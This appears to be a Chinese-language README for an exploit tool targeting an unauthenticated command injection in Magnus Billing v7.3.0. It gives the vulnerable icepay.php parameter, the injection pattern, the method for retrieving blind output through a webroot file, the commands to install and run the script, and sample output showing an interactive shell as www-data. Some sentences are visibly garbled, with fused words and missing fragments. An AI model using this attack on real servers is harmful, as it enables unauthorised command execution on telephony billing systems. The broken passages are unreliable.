Magnus Billing v7.3.0 存在未经身份验证的命令注入漏洞。
icepay.php中的democGET 参数未经过滤直接传递给 shell 函数,从而允许以 Web 服务器用户身份执行任意命令。该注入为盲注——输出不会反映在 HTTP 响应中——因此本漏洞利用脚本将每条命令的输出重定向到 webroot 内的文件中,并通过 HTTP 将其取回。
/mbilling/lib/icepay/icepay.php?democ=;<command>; 发送 GET 请求。out.txt)。如果目标使用不同的 webroot 路径,请调整脚本顶部的
OUTPUT_FILE。
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -t http://TARGET
示例:
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data